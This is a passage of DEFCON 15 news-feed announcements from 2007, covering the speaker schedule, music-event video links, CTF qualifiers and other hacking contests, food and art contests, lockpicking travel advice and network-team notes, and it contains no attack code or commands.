https://www.defcon.org/defconrss.xml We are proud to present the FINAL schedule of speakers and events for DEFCON 15! This year DEFCON has grown, and is offering the largest lineup of speakers ever, thanks to all the new space available at our new venue, the Riviera Hotel. Because of this there are also more contests. There is an overwhelming amount of things to participate in. Pending natural disasters, emergencies, or missing, kidnapped or canceled speakers, this is our final schedule... well, that's the intention anyway! If you are speaking or involved in the content side of things and you see a problem or something missing, please let us know! See you at the show!

==> (beta) DEFCON 14 Black and White Video and Audio released!

https://www.defcon.org/defconrss.xml The video and audio from DEFCON 14 have been encoded and are ready for download! There may be some minor tweaks, but all the video that is available has been encoded to iPod Video specs, H.264 at 320x240. Audio is in .mp3 192k format. We are trying to identify the artists in each hour, so if you know who they are, please let us know and we'll update the file names so everyone gets proper credit. The following links will have to get you by until the complete RSS feed with iTunes and MRSS tags is complete:
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Carthsis-320-517kbps.mp4
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Regenerator-320-517kbps.mp4
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Jackalope-320-517kbps.mp4
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Mind-Pop-320-517kbps.mp4
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Minibosses-320-517kbps.mp4
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-2-320-517kbps.mp4
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-3-320-517kbps.mp4
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-4-320-517kbps.mp4
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-5-320-517kbps.mp4
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-6-320-517kbps.mp4
http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-7-320-517kbps.mp4

==> Black and White Ball Lineup Announced!

https://www.defcon.org/defconrss.xml The Black and White Ball is back in effect with the following bands and DJs ready to throw down.
Friday Night: Black Ball (Industrial / EBM / Noize). Dress: your best blacks; bondage, rubber and fetish encouraged. Featuring: Regenerator http://www.regenerator.net/ DJs: Patrice, Wintamute, SailorGloom, Great Scott!, Catharsis, Kriz Klink, and more...
Saturday Night: White Ball ==Geekdom Release Party==. Dress: your finest stormtrooper suit, togas, bedsheets and the like. Featuring: Miss DJ Jackalope // Jungle Chaos http://www.dj-jackalope.com/ ; DualCore // Live Nerdcore Set http://dualcoremusic.com ; *Minibosses // NES classics http://www.minibosses.com/ DJs: Rustcycle // Electronic live mix http://www.rustcycle.com ; Crashish // DNB ; Casey // psytrance ; Mitch Mitchem // breakbeat/electroclash
* Scheduling tentative. All acts subject to change; please see the complete listing posted throughout DEFCON venues.

==> Amateur Radio at DEFCON 15

https://www.defcon.org/defconrss.xml For all you radio geeks! 146.58 (FM Simplex) will be the unofficial Defcon 15 frequency for Amateur Radio enthusiasts.

==> Sushicon 4.0

https://www.defcon.org/defconrss.xml Wednesday, August 1st at the Sushi Factory on Tropicana will be the location for SushiCon 4.0, right before DEFCON. Love sushi? Want to meet new people and hang out in a sake-fueled pre-con ritual? Then SushiCon is for you! Organized by GonMinusOne; check out the forums for the latest details. https://forum.defcon.org/showthread.php?t=8578

==> World Premiere of Infest Wisely to be shown at DEFCON

https://www.defcon.org/defconrss.xml This year's DEFCON Movie Night will feature the new and highly buzz-worthy film "Infest Wisely." The film is centered around the increasingly less science-fictional world of commercial nanotechnology, and it's been described this way: "Infest Wisely asks what would happen if Critical Mass teamed up with the geeks from DEFCON to stop commercialized nanotech from taking over our bodies and the world." It's a feature-length movie in seven episodes, each with different directors but all written by novelist Jim Munroe, who will be our special guest for the screening. As always, there's no charge; come join us and support cinema licensed under the Creative Commons. For more information about the film, you can check out its website. http://www.infestwisely.com/

==> DEFCON 15 Schedule now on-line!

https://www.defcon.org/defconrss.xml We are proud to present the schedule of speakers and events for DEFCON 15! This year DEF CON has grown, and is offering the largest lineup of speakers ever, thanks to all the new space available at our new venue, the Riviera Hotel. Because of this there are also more contests. There is an overwhelming amount of things to participate in. Please note that this is the first schedule version and is not final. As speakers and contests finalize their information, the schedule will be updated up to the last minute. If you're speaking or involved in the content side of things and you see a problem or something missing, please let us know!

==> New ToxicBBQ Contests!

https://www.defcon.org/defconrss.xml From Deviant: "There are two contests/events that I'll be running at this year's ToxicBBQ, both of which involve the "Exotic Meat" theme that I tend to focus upon year after year. I have a web page up online with full details, rules, info, etc... http://deviating.net/toxicbbq"
-=[ Titanium Chef ]=-
Cost to Participate: $40 per team
Prizes for Winners: OiNK invite for each team member, secret grand prize, refund of entry fee, extreme bragging rights, and free giveaways of fun stuff to all participants
DefCon Forums Sign-up Thread: https://forum.defcon.org/showthread.php?t=8367
Teams of up to three individuals will put their heads together and engage in heated battle to concoct a delicious dining experience focused around a secret theme ingredient. These hacker chefs will have both their culinary skills and their organizational abilities put to the test in this challenging event. All participants will gather together a few hours before the Toxic BBQ in order to witness the revealing of the event's secret ingredient; then they will disperse in order to gather supplies, reach Sunset Park, and prepare their food for the judges. Whose cuisine will reign supreme? Will opponents' grill-fu be stronger than yours? Participate and find out!
-=[ Guess The Flesh ]=-
Cost to Participate: $10 per person
Prizes for Winners: OiNK invite for the first three people to correctly identify all meats. Free giveaways of fun stuff to all participants
DefCon Forums Sign-up Thread: https://forum.defcon.org/showthread.php?t=8365
Have you ever thought to yourself, "Gee, I wish I could dine on the meat of nearly every kind of beast to walk the earth... but I don't own many high-powered firearms, I don't have the money to travel the world, and no government in their right mind would issue me a hunting license?" Well, now your dreams can become a reality. For less than the cost of what passes for a movie and popcorn nowadays, you can have a sample platter featuring eight meats that you aren't likely to see at the supermarket. However, instead of just cooking and randomly giving out samples willy-nilly, this year I have something new planned. I intend to prepare morsels of these meats and plate them in a way that they are not immediately identifiable or distinguishable from one another. Those who are eager to try some new flavors, and those who think their palates are up to the challenge, can take a whack at identifying these various animals by taste and texture alone.

==> Be Prepared! Update

https://www.defcon.org/defconrss.xml The Be Prepared section of the DEFCON 15 site has been updated! Check it out.

==> Las Vegas concerts for Black Hat and DEFCON time frame

https://www.defcon.org/defconrss.xml From IrishMASMS on the DEFCON forums comes this helpful post: Las Vegas concerts for Black Hat & DEFCON time frame. Some out of town folks hit me up asking about concerts around town during this year's Black Hat and DEFCON. I took a quick look on http://pollstar.com/ and http://www.jambase.com/ for what might be interesting. YMMV, though I thought sharing is caring.
Fri 07/27/07 Violent Femmes - Hard Rock Hotel and Casino
Fri 07/27/07 Jonny Lang - House Of Blues
Sat 07/28/07 Tesla - House Of Blues
Sat 07/28/07 Rush - MGM Grand Garden Arena
Wed 08/01/07 John Lee Hooker Jr. - Santa Fe Station Hotel & Casino
Thu 08/02/07 John Lee Hooker Jr. - Boulder Station Hotel & Casino
Fri 08/03/07 Godsmack - The Pearl Concert Theater At Palms
Sat 08/04/07 Buckcherry, Hinder, Papa Roach - The Pearl Concert Theater At Palms
Sun 08/05/07 Against All Authority, Reel Big Fish / Less Than Jake, Streetlight Manifesto - House Of Blues
Mon 08/06/07 "Sounds Of The Underground": Amon Amarth, Chimaira, Every Time I Die, GWAR, Heavy Heavy Low Low, Job For A Cowboy, Necro, Shadows Fall, The Devil Wears Prada, The Number Twelve Looks Like You - House Of Blues
Sat 08/11/07 The Fixx - The Club @ Cannery Casino
As for venues, the Hard Rock sucks. House of Blues is one of the best in town. MGM Grand is ok, but the sound quality in the arena can be bleep in spots. The Pearl is the brand new venue in town; good luck getting tickets. The Station casinos are not bad venues, and I think those are free shows. The Cannery Casino I have never been to, so I can not say - and there is no review posted on www.yelp.com yet for me to reference. HTH!

==> Scavenger Hunt! Advice from the Winners!

https://www.defcon.org/defconrss.xml Scavenger Hunt! Advice from the Winners!! Free advice courtesy of hackajar with Vegas 2.0. Here's a quick list of things you will need to be fully geared up, if competing. I kinda wish we had something like this three years ago!
1.) Money - we spent ~$500 each year, though some good social engineering could very well fix this
2.) Digital Camera - Judges won't know what you did without proof!
3.) Video Camera - Sometimes a photo DOESN'T say a thousand words, but motion video does!
4.) Transportation - Sometimes you have to go on recon; we always paid extra to have a car in front of valet for those quick runs
5.) Room at Hotel - Need somewhere to build a 30ft straw or host a geek girl strip off? Your best bet is in a local room
6.) Printer - Don't ask me how many points we never got for lack of a stupid printer!
7.) Beer - It's easy to bribe goons and judges with this stuff, if you can find it.
8.) Start Early - Some items and tasks we could only do on Friday; remember things close on Saturday and Sunday, so be wise!
9.) Memorize the phrase "It's for the Scavenger Hunt" - nuff said
I'm sure I'm missing something else in there, please add to my list! -Vegas 2.0 Defcon 14 Scav Hunt Winners

==> DEFCON 15 CFP is now closed!

https://www.defcon.org/defconrss.xml DEFCON 15 CFP is now closed! We are in the process of making our final selections and will start to fill in the online schedule soon! We will notify you of the status of your submission by July 1st. If you have not heard from us by then, please email talks[at]defcon[dot]org. If you were not accepted, don't be discouraged; we have received many, many quality submissions this year but we can't accept them all. As you know, we are in the process of expanding to accept more and more talks each year. There is still plenty you can do to get involved: join the forums, read up on our contests, even just take some cool pictures! pics.defcon.org is now live for use. The pics software is integrated with the DEFCON forums, so if you already have an account there you automatically have an account on https://pics.defcon.org/ Do your Photoshop skilz 0wnzor?! The DEFCON Art Contest is currently open! Submit your art by June 25 to be used online and to be included in the DEFCON 15 program. We are looking for a Web Banner, Key Card, T-Shirt and Wallpaper! If you win, you could win free admission and cash to be used at the DEFCON Swag booth! https://www.defcon.org/html/defcon-15/dc-15-forms/DC15-Artwork-Contest-Guidelines.pdf

==> New "Be Prepared"- Lock Picking for Sport and Amusement

https://www.defcon.org/defconrss.xml Lock Picking for Sport and Amusement DEFCON is a great place to learn all sorts of new skills - the skill of lockpicking is no exception. This year's Con will again have a "Lockpicking Village" - a fantastic event with all kinds of presentations, practice locks, sample tools and general education. We want everyone who's interested to check it out, but we want you to be careful and safe as well. Be sure to consult your state and local laws about possession of locksmith's tools. Staying in compliance with the applicable laws is, of course, your responsibility. When traveling, it's not a good idea to put tools of this nature in your carry-on. While they're unlikely to cause any problems in checked baggage, those pointy little devils are very likely to be a problem in the security line. It probably ought to go without saying, but if you're making an international trip to DefCon, the scrutiny is much higher and you owe it to yourself to be thoroughly familiar with the rules and err on the side of caution. You don't need that kind of hassle. There's plenty of lockpicking knowledge and fun to be had even without your k-rad tools, so don't put yourself in a position to miss your flight. It's also an option to mail them to yourself in care of your hotel. Some hotels charge for this service, so be aware of the policies wherever you're staying. If the world of locksport is brand new to you and you're looking to get a little knowledge before the Con, you can check out Marc Weber Tobias' contributions to techblog Engadget (called The Lockdown). More info is also available from Locksport International (lsi.com) or The Open Organization of Lockpickers (toool.us, or toool.nl for Dutch speakers). Link: https://www.defcon.org/html/defcon-15/dc-15-beprepared.html

==> Hackers on A Plane!

https://www.defcon.org/defconrss.xml Hey Hey! If you haven't seen it yet, check out Hackers on a Plane! 2007 is a very special year for the global hacker community. Thanks to cooperation between the organizers of DefCon XV and the Chaos Communications Camp 2007, the two largest gatherings of hackers from around the world happen only a few days apart! This is where "Hackers on a Plane" comes in: The Hacker Foundation has put together a complete travel package to help bring together hackers from around the world for ten days of fun, culture and community. We see it as the first step to building a truly global hacker community. $1,337.00 (for those travelling roundtrip from the US & Canada) 1,337.00 (for those travelling roundtrip from Europe) Gets you:
* Admission to DefCon in Las Vegas, NV, USA
* Flight from Las Vegas to Frankfurt
* Flight on the "Hackers on a Plane" charter flight from Frankfurt to Finow Airport
* Admission to all days of CCCamp2007
* Accommodation at Camp Anaconda (no need to bring a tent!)
* Return flight to select destinations in the USA (or flight to Las Vegas for DefCon for EU citizens.)
More info at Hackers on a Plane! Link: http://hackersonaplane.info/info.html

==> LosT @ Con Mystery Box Challenge - Official Registration Open!

https://www.defcon.org/defconrss.xml mysterychallenge.org Official registration is open. To register, teams must send an email to: Defcon15MysteryChallenge ]at[ mysterychallenge [dot] org
- Teams are limited to 5 official members
- You must receive a confirmation that your team is registered or you are NOT
- You must submit a team name and list team members
- Teams successful in completing the challenge last year are guaranteed a spot if registered by June 17.
- New teams are encouraged to enter, however only those serious about completing the challenge
- The challenge will take longer to complete this year
Questions? Post here. Comments? Post here. New teams trying to decide if you have what it takes to compete? Post here (I encourage those who competed last year to answer these types of questions...) Link: https://forum.defcon.org/showthread.php?t=8509

==> NEW CONTEST! 0wn the box? Own the box!

https://www.defcon.org/defconrss.xml From ownthebox.cipherpunx.org/: Are you a defensive ninja? Are your services unbreakable, your builds airtight? Do your countermeasures have countermeasures for counter-countermeasures? So prove it, bucko... Bet your box on it, on the most hostile network in the world. Bring your laptop/server/desktop, hardened to the nines, running exactly two (2) visible services, to our specs, and we'll offer you up for the slaughter. The first person to compromise you walks away with your gear. When you're 0wned, you're owned. It's that simple. The last box(en) standing, unowned, wins, and the winner(s) can take his/her precious back home, safe in the knowledge that if it survived at DC, it can survive anywhere. For the other side of the fence, the reward is clear... Pick your target, 0wn the box, and own the box. A shopping spree for the elite. Link: https://forum.defcon.org/forumdisplay.php?f=337 Contest Site: http://ownthebox.cipherpunx.org/ Be sure to check the forums often it looks like they have already started to collect an interesting list of hardware up for the slaughter! Mwahahaha!

==> Announcing The DefCon 15 Wireless Contest

https://www.defcon.org/defconrss.xml Announcing The DefCon 15 Wireless Contest (cue Thus Spake Zarathustra) Are you a freq-geek? Think your WiFiFu is hot? Get high from sniffing packets on the ether? Think you're a great lover? We can't help you with the last one, but get ready, because here's your chance to prove the rest of those outlandish claims to the world. Compete in the Wireless Contest, and we can validate your self-esteem, at least in the geeky stuff. The Wireless Contest, following the format of the past few years, will be a series of "Mini-Contests". You can compete in only a single mini-contest or all of them. We recommend that teams be formed to fill in different skill areas. We are allowing an unlimited number of teams - subject to resources - limited to 3 people each. First-place winners of individual mini-contest events get prizes, and a top prize will be awarded for the best overall across the contests. A common problem with the Wireless Contest in the last few years is that some potential competitors felt that they didn't have the skills to even try. As a result, fewer competitors kept signing up. To alleviate this, the Wireless Contest this year is tied in heavily with the Wireless Village. If you want to compete in the contest but feel you don't have a needed skill, you can come to the Wireless Village before a mini-contest and learn the needed skill at one of the Wireless Village's world-famous Breakout Sessions. You walk in having no skills but a willingness to learn, learn a skill in an exciting breakout session taught by an expert, then go out and compete and beat the pants off those loudmouth teams who said they'd pwn you. Learn + Touch = DO! link: https://forum.defcon.org/forumdisplay.php?f=309

==> CTF Qualifications Are Complete!

https://www.defcon.org/defconrss.xml From invisigoth: The qualification round for this year's CTF is complete. More than 150 teams were actually submitting answers, which means that participation for this year was more than double the previous high water mark (as far as we're aware). Results may be found at http://www.kenshoto.com/ as always. This year's challenges came in a wide range of technologies and difficulties. No single team actually solved them all... Additionally, this year's level of international participation was staggering... The MUD for this year will remain up for teams to ask questions and hopefully collaborate with each other about how they came to solutions for some of the harder challenges. Additionally, we will be putting most if not all of the challenges back online for a while so everybody can sharpen up... Stay tuned...

==> DEFCON 15 Network Team has two slots left!

https://www.defcon.org/defconrss.xml From the site defconnetworking.org: "DefCon presents a really unique opportunity. You know how hostile the environment is. Have you ever wondered what that traffic looks like? All you need do is ask. For years we've provided people the ability to plug in a capture/sniffer box and capture public con traffic to take back to your Evil Laboratory(tm) for analysis after con (you know, once you've sobered up & stuff). If you want in on the action, email us so we can RSVP a spot for you on our Table-of-Doom in the NOC." TWO SLOTS LEFT! To get an idea, check out last year's network. Here are the PPT slides from the DC14 Closing Ceremonies with all the net stats: DC14network.ppt http://www.defconnetworking.org/dc14network.ppt Remember, if you're planning anything "special", or have specific needs for your talk, for your demo, for your break-out session, let us know EARLY so we can plan for it. About Defcon Networking: We're the group of volunteers who run the network at DEFCON. It's our job to design, plan, architect, implement, and secure the show network. We arrange bandwidth, we handle wireless, we provide secure connections for show staff, speakers, and press. Finally, we provide an environment where DefCon attendees can share and be creative.

==> DEFCON 15 Speakers Selected!

https://www.defcon.org/defconrss.xml New speakers have been selected for DEFCON 15! Check out their abstracts and bios online now. The schedule is not yet finished and we still have room for a few more talks! So don't get discouraged, submit your rootfu now! Speaker page: http://www.defcon.org/html/defcon-15/dc-15-speakers.html New speakers selected:
Squidly1, aka Theresa Verity, Thinking Outside the Console (box)
Brendan O'Connor, Greater than 1: Defeating "strong" Authentication in Web Applications
Kenneth Geers, Greetz from Room 101
Peter Berghammer (pf0t0n), A Journalist's Perspective on Security Research
Schuyler Towne, Locksport: An Emerging Subculture
Many more are online, check back often, the DEFCON 15 Schedule will be online shortly!

==> DEFCON 15 CFP Closing soon

https://www.defcon.org/defconrss.xml The DEFCON 15 CFP will be Closing June 15th! Please submit your rootfu to talks@defcon.org. We have been making selections and we are pleased to have accepted some really great speakers. There is still room to squeeze in a few more exceptional talks. Submit now, there will be no extensions possible! Submit: https://www.defcon.org/html/defcon-15/dc-15-cfp.html New for DEFCON 15: The second year being at the Riviera has allowed us to make some changes to the format from last year. We have more speaking rooms, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. You tell us how much time you need, and we try to accommodate you! If you have an IDEA please submit it, talks@defcon.org!

==> Amateur CTF Registration now OPEN!

https://www.defcon.org/defconrss.xml Registration for this year's aCTF is officially open! Registration page: http://www.dc949.org/aCTFIII/register.php From the Contest Organizers: "We're recommending that you group yourselves in teams of three, as the prizes will come in triplicate. There will be prizes for win, place and show. We have some really good stuff in the works in terms of prizes, but I'm not going to mention them here since they're not bought and in our hands (and/or built)" For a little more information about the setup this year: http://www.dc949.org/aCTFIII/README.php

==> Announcing Official DC949 aCTF Artwork Contest!

https://www.defcon.org/defconrss.xml Official DC949 aCTF Artwork Contest The winner's artwork will be made into an 8x4 foot vinyl sign. Besides bragging rights, the winner will also receive a yet-to-be-determined prize. Rules
1. The contest will remain open for a minimum of 1 week, and will remain open until a winner is chosen.
2. Submissions must have a 2x1 or 1x2 ratio with a minimum resolution of 2000x1000 pixels.
3. Artwork must contain simplistic designs and colors, i.e. designs with definitive edges and no fading or merging colors.
4. The maximum number of colors that can be used is 4.
5. Artwork must contain "DC949" and "aCTF" in some legible form.
Submissions must contain a .PNG, .JPG, or .GIF of the artwork as well as a vector format (.PSD, .EPS, etc). Please email submissions to cp-at-dc949-dot-org Forums discussion is here: https://forum.defcon.org/showthread.php?t=8456 Don't forget to use your talents to enter the DEFCON 15 Artwork Contest too! DEFCON 15 Artwork Contest Guidelines http://www.defcon.org/html/defcon-15/dc-15-forms/DC15-Artwork-Contest-Guidelines.pdf Submission deadline: All submissions must be received by June 25, 2007. Submit all entries to: sleestak\at\defcon dot org Categories: Web Banner, Key Card, T-shirt, Wallpaper. Banner Art Prize: The first place winner will receive free admission to DEFCON 15 for one person (non-transferable to a future con), $50 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. T-Shirt Art Prize: Free admission to DEFCON 15 for two persons, $130 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. Wallpaper Art Prize: Free admission to the conference for one person, $50 credit that may be used at the official DEFCON SWAG Store

==> DEFCON 15 Network Team in Effect!

https://www.defcon.org/defconrss.xml As DC 15 gets closer, all goon teams are powering up! Ever wonder what the network team is up to? Ever wanted to sniff the con traffic feed? Check out defconnetworking.org! Lockheed throws down some defcon history and gets us ready for more! From the site: DC15 Network 15MAY07 DefCon presents a really unique opportunity. You know how hostile the environment is. Have you ever wondered what that traffic looks like? All you need do is ask. For years we've provided people the ability to plug in a capture/sniffer box and capture public con traffic to take back to your Evil Laboratory(tm) for analysis after con (you know, once you've sobered up & stuff). If you want in on the action, email us so we can RSVP a spot for you on our Table-of-Doom in the NOC. 11MAY07 Why yes, we are in the midst of planning for DC15. Now that we've "done the dance" with the hotel (who are awesome folks, btw!) we know what we can and can't do and should have virtually no surprises this year. We're planning higher bandwidth, better monitoring, and also some new interactive-type stuff (I hesitate speaking of it for fear of jinxing it!). We're actually spending our funds boosting up our own infrastructure (beyond the Aruba kit we have) so we have more ports, better fibre connectivity, better trunking. Remember, if you're planning anything "special", or have specific needs for your talk, for your demo, for your break-out session, let us know EARLY so we can plan for it. --Lock

==> Announcing Amateur CtF 3 by DCG 949!

https://www.defcon.org/defconrss.xml From the official web site for the Amateur CtF: aCTF 3 "King of the Hill" Yes, it's official; we'll be back again this year. The first year, nobody scored, the wifi network we set up had massive problems, but people seemed to have a little fun and see the potential. Last year, the network was stable, people scored, battled back and forth, and we were actually able to give out some prizes. There was some trouble with boxes staying up, but overall it was a huge success. Last year we saw some things that surprised us. There was a case of two teams which both could take a flag, but neither could lock the other out. They both then proceeded to write scripts to play the game for them. Yeah, it then made the server inaccessible due to the massive amounts of requests, but still... hats off to both of you. We didn't expect automated hacking. We also learned that while Windows NT might have worked in our little test environment, it really can't hold up to the brutality of a Defcon contest. I'm happy to say that Windows NT will not be appearing in this year's contest. We will be changing a few things around this year, but the basics will be the same as before. Find a flag, find a way to put your team name on it, and you'll score points for as long as you can keep your flag up there. As usual, details on the contest will be limited; however, we will say that we're branching out a bit more this year. Hacking isn't just about buffer overflows and running metasploit, it's really about one-upping someone (or everyone) else. It's about figuring out how things work and taking them apart and putting them back together to do something different, customizing things to make them do things they were never intended to do, and just generally learning how to beat the system.

==> Announcing DefConBots Contest!

https://www.defcon.org/defconrss.xml Kallahar has updated the software page for the DefConBots Contest. "Improvements over last year include faster response times and software alignment of the camera to where the gun is actually shooting. All the code is public domain, do whatever you want with it!" What is the point of the contest, you ask? Quite simple: it is to create a computer-controlled gun that can shoot down targets in a shooting gallery. See http://defconbots.org/ for complete contest information.

==> NEW CONTEST! Guitar Hero II

https://www.defcon.org/defconrss.xml Guitar Hero II Contest!! A new contest at Defcon 15: Are you a Guitar Hero? Do your friends think you're l33t and can shred like a rock star? Then prove it! Contest Site: http://www.panadero.org/gh_home.html Forums discussion: https://forum.defcon.org/forumdisplay.php?f=335 Guitar Hero II - DEFCON STYLE!!!! Why Not!!! Rules (cause they tell us we have to have them...)
* The contest will consist of 3 levels of play: Medium, Hard and Expert.
* The contest will be played on Guitar Hero II, on the Xbox 360.
* An initial pre-qualification round will be held so that Experts aren't playing in the Medium level, etc... details of the prequals to come...
* All contestants should be at their assigned time to play 10 minutes before their time. There will be some leeway if you are a few minutes late, but don't expect to get your turn if you show up hungover an hour after your time.
* You may use your own guitar, as long as it has not been modified, and is for Xbox 360.
* Free play is a chance for people that have never played Guitar Hero to have a chance. It's not a chance for contestants to practice. This contest is for everyone, and we want to make sure that is the case. Free play will be limited to one song per person, depending on how many are waiting to play.
Scoring
* The 'prequals' will be designed to ensure that Experts are not playing in the Medium category just to win. We want the game to be fair, and everyone to have fun. We would hate for the lesser/newer players to be upset and frustrated because it's dominated by those that have years of practice.
* The 'heats' are designed to weed out the newbs from the Guitar Heroes. Each player will play 2 songs, back to back, to come up with a cumulative high score.
* The four highest scores will move to the finals for each level.
* The finals will be tournament style, head to head; most points win and move on to the final song.
* The final two players for each level will play against each other to become the first annual Defcon Guitar Hero champion!
* It is VERY important to pick the right songs to get into the finals. Some songs have more notes, for more Star Power and higher points, and some songs have fewer notes.
* All songs in the finals will be chosen by the event coordinators and will not be announced until the start of the finals. Final songs will not be songs included in Xbox Live downloadable content, so that no player has an advantage over others. GOOD LUCK!
Defcon STAR POWER!!! Do you want an extra 1000 points added on to your song??? Do ya? Bring me a COLD unopened beer! I won't accept it if it's opened (no date rape drugs for the contest organizers!) Any beer, except for Guinness, gets you an extra 1000 points of Star Power! Keep in mind that 6-packs are appreciated, but it will still only get you 1000 points! I love beer, but it's not fair to bring a case of beer and get an extra 12000 points!

==> Toxic BBQ contests and events!!

https://www.defcon.org/defconrss.xml Once again, the Toxic BBQ is looking for a slogan. Something catchy, something creative. It will be used on the front of the Toxic BBQ T-Shirts. Last year was ASTCell's slogan "If its dead we cook it" "If its alive we cook it" " ... a little longer." Submit your ideas. https://forum.defcon.org/showthread.php?p=86581#post86581 Come on, it's not that hard. Toxic BBQ IV Events and Contests: Iron Chef I Time: To Be Announced Contact: Deviant Ollam Event Desc: Contestants in teams of 3 or fewer will race to cook and present a dish made from an ingredient revealed to them at the start of the contest. After a timed preparation period, the dishes will be awarded points by a panel of judges who will judge for Presentation, Uniqueness, and Flavor! For more info on the Toxic BBQ go here: http://www.toxicbbq.com/ Forums discussion: https://forum.defcon.org/forumdisplay.php?f=308

==> Announcing CoffeeWars VIII: Pre-Con Ranting

https://www.defcon.org/defconrss.xml The Coffee Wars Crew is getting ready for their Call for Beans! From the website: Wake up and smell the coffee war, people: DefCon 15 is just around the corner, and that means another edition of the world's best-known hacker coffee competition. Already, the frenzy has begun! Now's the time when you have an All-Inclusive Divine Excuse to unashamedly mingle with your own kind without having to shroud your activities under the shadow of the Evil Corporate Coffee Empire! Yes, now we caffeine fiends can gather without shame! WHAT? You want a shot of espresso?! We got your shot right here, pal. This event ain't no freebie. If you want a cup, you gotta pony up. Coffee, that is. Whole bean. We're judging it all. The best, the strongest, the most caffeinated. You name it. ...but regular store-bought or corporate coffee trash will only earn a trashing. You think you got what it takes? Then we'll take what you got! Bring your best beans and put 'em up for judgment by our over-qualified, over-caffeinated, (and over-rated) Coffee Wars judges and contestant panel! We keep hearing that someone else's beans are the best. Now it's time to prove it bean-to-bean! Forums discussion is here: https://forum.defcon.org/forumdisplay.php?f=284

==> Announcing LosT @ Con Mystery Box Challenge!

https://www.defcon.org/defconrss.xml The idea is simple.. form a team, get a box, open box. But is it that simple? The box is a mystery, with many puzzles involved in opening it. To get things going for this year Lost Boy has started to accept team sign ups, as well as release clues to hint at some of the puzzles involved. Here is a picture on how NOT to open a mystery box: https://pics.defcon.org/showphoto.php?photo=153 For a bit on the last challenge check CNet's coverage here: http://news.com.com/2300-1029_3-6102806-5.html Interested? Check out the thread on the challenge over on the forums.

==> Capture the Flag Contest Announced!

https://www.defcon.org/defconrss.xml Capture the Flag at DEFCON continues its long tradition with the announcement by Kenshoto of the CtF qualification round! From their announcement: Kenshoto's army of code-gnomes has been working feverishly on the production of this year's installment of WarGamez (CTF), more to come here yet tonight, but we'll be making the quals announcement *very* soon. Check it: Dr. Kenneth Shoto proudly announces that the qualifying round for the Defcon Capture the Flag contest is now open for registration. The qualifying contest will start at 1 June 2007 @ 2200 EST and end 3 June 2007 @ 2200 EST. Teams can be any size you'd like (more ninjas clearly == better) and each team will need to register before 1 June 2007 @ 2200 EST in order to get an account for the actual game. The top 7 teams qualify for a seat at the table at the proverbial 'big show' (the actual CtF competition) to be held at Defcon 15. Defcon takes place August 3-5th 2007 (https://www.defcon.org/) so make sure you clear all those WoW, D&D, and Eve-Online play dates off your calendar early. That's right hackers and hackettes, get your debuggers warmed up and your shellcode tested, cuz it's that time of year again. What you say? You don't know what the bleep we're talking about? Well, peep dis: The core of the qualifying competition will be a quiz-like interface where each team may select a question and then must hack until they can answer it. Topics will vary widely, but of course include such fan-favorites as reversing martian binaries, landing shellcode and a double lutz simultaneously, and stealing information from strange places. We've also thrown in challenges like intar-webs hax0rification and mind-bendy trivia so the 5kr1p+ K1dd1e5 can play along (much love). This year the game allows for maximum parallelization on questions. When the leading team selects a question, that question (and all the ones they already answered) becomes available to the trailing teams. 
In other words, there is no need to register multiple ghost accounts as they won't give any advantage (*ahem*skewl*cough)... Don't have the stones to think you can win? Well, you should sign-up and play anyway. The winning team from last year actually got primed up for the game by competing in quals. They then kicked it up a notch by spending the next three months figuring out every detail of every challenge we put out there and explaining it all as if paid to do so (check it out http://nopsr.us/ctf2006prequal/). Besides, how else are you gonna sharpen those skillz and convert yourself from poser to p3wner? So what are you waiting for? Jump onto your nops-sled and slide over to http://kenshoto.allyourboxarebelongto.us:1337/ to sign up for quals now... -kenshoto (ctf07 at kenshoto.com)

==> Announcing the Art Work Contest!

https://www.defcon.org/defconrss.xml DEFCON 15 Artwork Contest Guidelines Submission deadline: All submissions must be received by June 25, 2007. Submit all entries to: sleestak\at\defcon dot org What we will do with your artwork: Art contest submissions will be added on-line to the DEFCON web site and may be included in the con program. By submitting artwork to us, you are allowing DEFCON to publish and reproduce your artwork in electronic and print formats. Categories: Web Banner, Key Card, T-shirt, Wallpaper. Required Elements: Artwork should incorporate a version of the following text: DEFCON / DefCon / Def Con with the number 15 / 2007 / Fifteen / 0x0F / XV / etc.. you get the point. It ties DEF CON to the year of the con. Artwork Preparation Specs: All continuous tone artwork must be at least 600dpi. The following formats are accepted for artwork:
- .EPS with Vector preferred, all fonts converted to outline
- .Jpg
- .Gif
- .Psd - layers with all fonts converted to outline
***We strongly recommend Illustrator Vector artwork for any submissions for the T-shirt or Key Card categories since these will need to be reproduced in print. Prizes:
1. Winners will be contacted individually and be announced on the website and recognized in the DEFCON 15 printed program.
2. There may be multiple winners per category.
3. DEFCON reserves the right to not select a winner for every category.
Banner Art Prize: The first place winner will receive free admission to DEFCON 15 for one person (non-transferable to a future con), $50 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. T-Shirt Art Prize: Free admission to DEFCON 15 for two persons, $130 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. Wallpaper Art Prize: Free admission to the conference for one person, $50 credit that may be used at the official DEFCON SWAG Store

==> Announcing Brew Wars!

